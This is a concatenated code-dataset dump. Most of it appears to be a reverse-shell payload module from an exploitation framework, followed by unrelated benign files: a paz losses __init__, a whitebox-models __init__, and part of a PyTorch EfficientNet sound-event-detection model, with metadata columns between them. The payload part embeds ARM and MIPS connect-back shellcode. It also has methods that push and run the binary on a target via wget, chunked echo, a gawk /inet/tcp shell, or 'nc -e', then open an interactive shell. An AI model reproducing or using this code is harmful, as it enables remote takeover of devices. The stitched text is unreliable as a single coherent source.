"\x18\x01\x01\x00" # .word 0x00010118
"\x20\x01\x01\x00" # .word 0x00010120
# elf binary
"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x73\x68\x00\x41\x13\x00\x00\x00\x61\x65\x61\x62\x69\x00"
"\x01\x09\x00\x00\x00\x06\x01\x08\x01\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72"
"\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x64"
"\x61\x74\x61\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x06\x00\x00\x00\x74\x80\x00\x00\x74\x00\x00\x00\xa4\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x18\x01\x01\x00\x18\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x27\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x23\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x37\x01\x00\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x02\x00\x00"
"\x40\x01\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00"
"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x03\x00\x00\x70\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x80\x00\x00\x00\x00\x00\x00"
"\x03\x00\x01\x00\x00\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x03\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\xf1\xff\x0f\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x16\x00\x00\x00\x20\x01\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x19\x00\x00\x00"
"\x74\x80\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x1c\x00\x00\x00\xb4\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x21\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x21\x00\x00\x00\x18\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x24\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00"
"\x10\x00\x02\x00\x2f\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x3d\x00"
"\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x49\x00\x00\x00\x74\x80\x00\x00"
"\x00\x00\x00\x00\x10\x00\x01\x00\x50\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00"
"\x02\x00\x5c\x00\x00\x00\x24\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x64\x00\x00\x00"
"\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x6b\x00\x00\x00\x24\x01\x01\x00\x00\x00"
"\x00\x00\x10\x00\x02\x00\x00\x72\x65\x76\x65\x72\x73\x65\x5f\x74\x63\x70\x2e\x6f\x00\x62"
"\x69\x6e\x61\x72\x79\x00\x73\x68\x00\x24\x61\x00\x6c\x6f\x6f\x70\x00\x24\x64\x00\x5f\x62"
"\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x5f\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x5f\x5f"
"\x00\x5f\x5f\x62\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f"
"\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x65\x64\x61"
"\x74\x61\x00\x5f\x65\x6e\x64\x00"
)
mipsel = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00"
"\x00\x00\x90\x00\x40\x00\x34\x00\x00\x00\x8c\x01\x00\x00\x00\x10\x00\x50\x34\x00\x20\x00"
"\x02\x00\x28\x00\x06\x00\x03\x00\x00\x00\x00\x70\x74\x00\x00\x00\x74\x00\x40\x00\x74\x00"
"\x40\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x60\x01\x00\x00\x60\x01\x00\x00\x05\x00"
"\x00\x00\x00\x00\x01\x00\xf4\x11\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00"
# <_ftext>:
"\xff\xff\x04\x28" # slti a0,zero,-1
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\x11\x11\x04\x28" # slti a0,zero,4369
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\x27\x28\x80\x01" # nor a1,t4,zero
"\xff\xff\x06\x28" # slti a2,zero,-1
"\x57\x10\x02\x24" # li v0,4183
"\x0c\x09\x09\x01" # syscall 0x42424
"\xff\xff\x44\x30" # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\x7a\x69\x05\x3c" # lui a1,0x697a
"\x02\x00\xa5\x34" # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" # sw a1,-8(sp)
"\x00\x01\x05\x3c" # lui a1,0x100
"\x7f\x00\xa5\x34" # ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" # sw a1,-4(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xef\xff\x0c\x24" # li t4,-17
"\x27\x30\x80\x01" # nor a2,t4,zero
"\x4a\x10\x02\x24" # li v0,4170
"\x0c\x09\x09\x01" # syscall 0x42424
"\x62\x69\x08\x3c" # lui t0,0x6962
"\x2f\x2f\x08\x35" # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" # sw t0,-20(sp)
"\x73\x68\x08\x3c" # lui t0,0x6873
"\x6e\x2f\x08\x35" # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" # sw t0,-16(sp)
"\xff\xff\x07\x28" # slti a3,zero,-1
"\xf4\xff\xa7\xaf" # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" # sw a3,-4(sp)
"\xec\xff\xa4\x23" # addi a0,sp,-20
"\xec\xff\xa8\x23" # addi t0,sp,-20
"\xf8\xff\xa8\xaf" # sw t0,-8(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xec\xff\xbd\x27" # addiu sp,sp,-20
"\xff\xff\x06\x28" # slti a2,zero,-1
"\xab\x0f\x02\x24" # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x06\x00\x00\x70\x02\x00\x00\x00\x74\x00"
"\x40\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
"\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x90\x00\x40\x00\x90\x00"
"\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x2a\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x02\x00\x00\xc0\x00\x00\x00\x05\x00"
"\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x03\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x00\x00\x00\x00\x03\x00\x01\x00\x00\x00"
"\x00\x00\x90\x00\x40\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x60\x01\x41\x00"
"\x00\x00\x00\x00\x10\x00\x02\x00\x08\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00\x10\x00"
"\xf1\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00"
"\x90\x00\x40\x00\x00\x00\x00\x00\x10\x00\x02\x00\x1b\x00\x00\x00\x90\x00\x40\x00\x00\x00"
"\x00\x00\x11\x00\x02\x00\x22\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff"
"\x2e\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x35\x00\x00\x00\x60\x01"
"\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x3a\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00"
"\x10\x00\xf1\xff\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
mips = (
# elf binary
"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00"
"\x00\x01\x00\x40\x00\x90\x00\x00\x00\x34\x00\x00\x01\x8c\x50\x00\x10\x00\x00\x34\x00\x20"
"\x00\x02\x00\x28\x00\x06\x00\x03\x70\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x74\x00\x40"
"\x00\x74\x00\x00\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01"
"\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x60\x00\x00\x01\x60\x00\x00"
"\x00\x05\x00\x01\x00\x00\x20\x00\x11\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x41\x81\x50\x00\x00\x00\x00"
# <_ftext>:
"\x28\x04\xff\xff" # slti a0,zero,-1
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x28\x04\x11\x11" # slti a0,zero,4369
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x01\x80\x28\x27" # nor a1,t4,zero
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x10\x57" # li v0,4183
"\x01\x09\x09\x0c" # syscall 0x42424
"\x30\x44\xff\xff" # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x05\x00\x02" # lui a1,0x2
"\x34\xa5\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" # sw a1,-8(sp)
"\x3c\x05\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" # sw a1,-4(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x24\x0c\xff\xef" # li t4,-17
"\x01\x80\x30\x27" # nor a2,t4,zero
"\x24\x02\x10\x4a" # li v0,4170
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x08\x2f\x2f" # lui t0,0x2f2f
"\x35\x08\x62\x69" # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" # lui t0,0x6e2f
"\x35\x08\x73\x68" # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" # sw t0,-16(sp)
"\x28\x07\xff\xff" # slti a3,zero,-1
"\xaf\xa7\xff\xf4" # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" # sw a3,-4(sp)
"\x23\xa4\xff\xec" # addi a0,sp,-20
"\x23\xa8\xff\xec" # addi t0,sp,-20
"\xaf\xa8\xff\xf8" # sw t0,-8(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x27\xbd\xff\xec" # addiu sp,sp,-20
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x0f\xab" # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x70\x00\x00\x06\x00\x00\x00\x02\x00\x40"
"\x00\x74\x00\x00\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
"\x00\x00\x00\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\x90\x00\x00"
"\x00\x90\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x60\x00\x00"
"\x00\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01"
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x7c\x00\x00\x00\xc0\x00\x00"
"\x00\x05\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x3c\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x74\x00\x00\x00\x00\x03\x00\x00\x01\x00\x00"
"\x00\x00\x00\x40\x00\x90\x00\x00\x00\x00\x03\x00\x00\x02\x00\x00\x00\x01\x00\x41\x01\x60"
"\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x08\x00\x41\x81\x50\x00\x00\x00\x00\x10\x00"
"\xff\xf1\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x14"
"\x00\x40\x00\x90\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x1b\x00\x40\x00\x90\x00\x00"
"\x00\x00\x11\x00\x00\x02\x00\x00\x00\x22\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1"
"\x00\x00\x00\x2e\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x35\x00\x41"
"\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x3a\x00\x41\x01\x60\x00\x00\x00\x00"
"\x10\x00\xff\xf1\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
exploit = None
arch = None
lhost = None
lport = None
binary_name = None
revshell = None
def __init__(self, exploit, arch, lhost, lport):
self.exploit = exploit
self.arch = arch
self.lhost = lhost
self.lport = lport
def convert_ip(self, addr):
res = ""
for i in addr.split("."):
res += chr(int(i))
return res
def convert_port(self, p):
res = "%.4x" % int(p)
return bytearray.fromhex(res)
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[2:] + self.mips[0xf8:]
else:
print_error("Platform not supported")
def http_server(self, lhost, lport):
print_status("Setting up HTTP server")
server = HttpServer((lhost, int(lport)), HttpRequestHandler)
server.serve_forever(self.revshell)
server.server_close()
def wget(self, binary, location):
print_status("Using wget method")
# generate binary
self.generate_binary(self.lhost, self.lport)
# run http server
thread = threading.Thread(target=self.http_server, args=(self.lhost, self.lport))
thread.start()
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(binary,
self.lhost,
self.lport,
self.binary_name,
location,
self.binary_name)
self.exploit.execute(cmd)
# execute binary
sock = self.listen(self.lhost, self.lport)
self.execute_binary(location, self.binary_name)
# waiting for shell
self.shell(sock)
def echo(self, binary, location):
print_status("Using echo method")
# generate binary
self.generate_binary(self.lhost, self.lport)
path = "{}/{}".format(location, self.binary_name)
size = len(self.revshell)
num_parts = (size / 30) + 1
# transfer binary through echo command
print_status("Using echo method to transfer binary")
for i in range(0, num_parts):
current = i * 30
print_status("Transferring {}/{} bytes".format(current, len(self.revshell)))
block = self.revshell[current:current + 30].encode('hex')
block = "\\\\x" + "\\\\x".join(a + b for a, b in zip(block[::2], block[1::2]))
cmd = 'echo -ne "{}" >> {}'.format(block, path)
self.exploit.execute(cmd)
# execute binary
sock = self.listen(self.lhost, self.lport)
self.execute_binary(location, self.binary_name)
# waiting for shell
self.shell(sock)
def awk(self, binary):
print_status("Using awk method")
# run reverse shell through awk
sock = self.listen(self.lhost, self.lport)
cmd = binary + " 'BEGIN{s=\"/inet/tcp/0/" + self.lhost + "/" + self.lport + "\";for(;s|&getline c;close(c))while(c|getline)print|&s;close(s)};'"
self.exploit.execute(cmd)
# waiting for shell
self.shell(sock)
def netcat(self, binary, shell):
# run reverse shell through netcat
sock = self.listen(self.lhost, self.lport)
cmd = "{} {} {} -e {}".format(binary, self.lhost, self.lport, shell)
self.exploit.execute(cmd)
# waiting for shell
self.shell(sock)
def execute_binary(self, location, binary_name):
path = "{}/{}".format(location, binary_name)
cmd = "chmod 777 {}; {}; rm {}".format(path, path, path)
thread = threading.Thread(target=self.exploit.execute, args=(cmd,))
thread.start()
def listen(self, lhost, lport):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((lhost, int(lport)))
sock.listen(5)
return sock
def shell(self, sock):
print_status("Waiting for reverse shell...")
client, addr = sock.accept()
sock.close()
print_status("Connection from {}:{}".format(addr[0], addr[1]))
print_success("Enjoy your shell")
t = telnetlib.Telnet()
t.sock = client
t.interact()
| 50.595876
| 152
| 0.573006
| 4,162
| 24,539
| 3.361365
| 0.096588
| 0.468335
| 0.539743
| 0.535239
| 0.648821
| 0.60629
| 0.564689
| 0.530593
| 0.494568
| 0.476912
| 0
| 0.31149
| 0.233221
| 24,539
| 484
| 153
| 50.700413
| 0.432026
| 0.123029
| 0
| 0.229268
| 0
| 0.258537
| 0.568784
| 0.434169
| 0.002439
| 0
| 0.003187
| 0
| 0
| 1
| 0.039024
| false
| 0.002439
| 0.014634
| 0.002439
| 0.095122
| 0.053659
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9655c4750065c8aab745ce56346ad3da6bed2402
| 196
|
py
|
Python
|
paz/optimization/losses/__init__.py
|
niqbal996/paz
|
f27205907367415d5b21f90e1a1d1d1ce598e889
|
[
"MIT"
] | 300
|
2020-10-29T08:02:05.000Z
|
2022-03-30T21:47:32.000Z
|
paz/optimization/losses/__init__.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 30
|
2020-10-29T12:40:32.000Z
|
2022-03-31T14:06:35.000Z
|
paz/optimization/losses/__init__.py
|
albertofernandezvillan/paz
|
9fbd50b993f37e1e807297a29c6044c09967c9cc
|
[
"MIT"
] | 62
|
2020-10-29T12:34:13.000Z
|
2022-03-29T05:21:45.000Z
|
from .multi_box_loss import MultiBoxLoss
from .keypointnet_loss import KeypointNetLoss
from .segmentation import DiceLoss
from .segmentation import FocalLoss
from .segmentation import JaccardLoss
| 32.666667
| 45
| 0.872449
| 23
| 196
| 7.304348
| 0.521739
| 0.285714
| 0.392857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 196
| 5
| 46
| 39.2
| 0.954545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96664eda008c9845b63827dabf5fba29b985a2b0
| 188
|
py
|
Python
|
models/whitebox/__init__.py
|
yidinghao/whitebox-lstm
|
dcdeaf11c8c374d200801791b59c007094f70baf
|
[
"MIT"
] | 2
|
2020-11-17T21:57:24.000Z
|
2021-01-23T13:16:24.000Z
|
models/whitebox/__init__.py
|
yidinghao/whitebox-lstm
|
dcdeaf11c8c374d200801791b59c007094f70baf
|
[
"MIT"
] | null | null | null |
models/whitebox/__init__.py
|
yidinghao/whitebox-lstm
|
dcdeaf11c8c374d200801791b59c007094f70baf
|
[
"MIT"
] | null | null | null |
from models.whitebox.bracket import BracketRNN
from models.whitebox.counter import CounterRNN
from models.whitebox.sp import SPRNN, FSARNN
from models.whitebox.whitebox import WhiteBoxRNN
| 37.6
| 48
| 0.861702
| 25
| 188
| 6.48
| 0.48
| 0.246914
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090426
| 188
| 4
| 49
| 47
| 0.947368
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
96ac18b0d66457623d682bcb15d0e966f46ec30b
| 7,189
|
py
|
Python
|
models/effcientnet.py
|
koukyo1994/kaggle-rfcx
|
c3573d014d99312b58882e7b939de6c1055129b1
|
[
"MIT"
] | 6
|
2021-02-18T05:18:17.000Z
|
2022-02-19T02:49:32.000Z
|
models/effcientnet.py
|
koukyo1994/kaggle-rfcx
|
c3573d014d99312b58882e7b939de6c1055129b1
|
[
"MIT"
] | null | null | null |
models/effcientnet.py
|
koukyo1994/kaggle-rfcx
|
c3573d014d99312b58882e7b939de6c1055129b1
|
[
"MIT"
] | 2
|
2021-02-18T11:31:50.000Z
|
2022-02-19T02:49:07.000Z
|
import timm
import torch
import torch.nn as nn
import torch.nn.functional as F
from efficientnet_pytorch import EfficientNet
from .layers import AttBlockV2
from .utils import init_layer, interpolate, pad_framewise_output
class TimmEfficientNetSED(nn.Module):
def __init__(self, base_model_name: str, pretrained=False,
num_classes=264):
super().__init__()
self.interpolate_ratio = 30 # Downsampled ratio
self.base_model = timm.create_model(base_model_name, pretrained=pretrained)
in_features = self.base_model.classifier.in_features
modules = list(self.base_model.children())
self.base_model = nn.Sequential(*modules[:-2])
self.fc1 = nn.Linear(in_features, in_features, bias=True)
self.att_block = AttBlockV2(in_features, num_classes, activation="sigmoid")
self.init_weight()
def init_weight(self):
init_layer(self.fc1)
def forward(self, input):
frames_num = input.size(3)
# (batch_size, channels, freq, frames)
x = self.base_model(input)
# (batch_size, channels, frames)
x = torch.mean(x, dim=2)
# channel smoothing
x1 = F.max_pool1d(x, kernel_size=3, stride=1, padding=1)
x2 = F.avg_pool1d(x, kernel_size=3, stride=1, padding=1)
x = x1 + x2
x = F.dropout(x, p=0.5, training=self.training)
x = x.transpose(1, 2)
x = F.relu_(self.fc1(x))
x = x.transpose(1, 2)
x = F.dropout(x, p=0.5, training=self.training)
(clipwise_output, norm_att, segmentwise_output) = self.att_block(x)
logit = torch.sum(norm_att * self.att_block.cla(x), dim=2)
segmentwise_logit = self.att_block.cla(x).transpose(1, 2)
segmentwise_output = segmentwise_output.transpose(1, 2)
interpolate_ratio = frames_num // segmentwise_output.size(1)
# Get framewise output
framewise_output = interpolate(segmentwise_output,
interpolate_ratio)
framewise_output = pad_framewise_output(framewise_output, frames_num)
framewise_logit = interpolate(segmentwise_logit, interpolate_ratio)
framewise_logit = pad_framewise_output(framewise_logit, frames_num)
output_dict = {
"framewise_output": framewise_output,
"segmentwise_output": segmentwise_output,
"logit": logit,
"framewise_logit": framewise_logit,
"clipwise_output": clipwise_output
}
return output_dict
class TimmEfficientNetSEDMax(nn.Module):
def __init__(self, base_model_name: str, pretrained=False,
num_classes=264):
super().__init__()
self.interpolate_ratio = 30 # Downsampled ratio
self.base_model = timm.create_model(base_model_name, pretrained=pretrained)
in_features = self.base_model.classifier.in_features
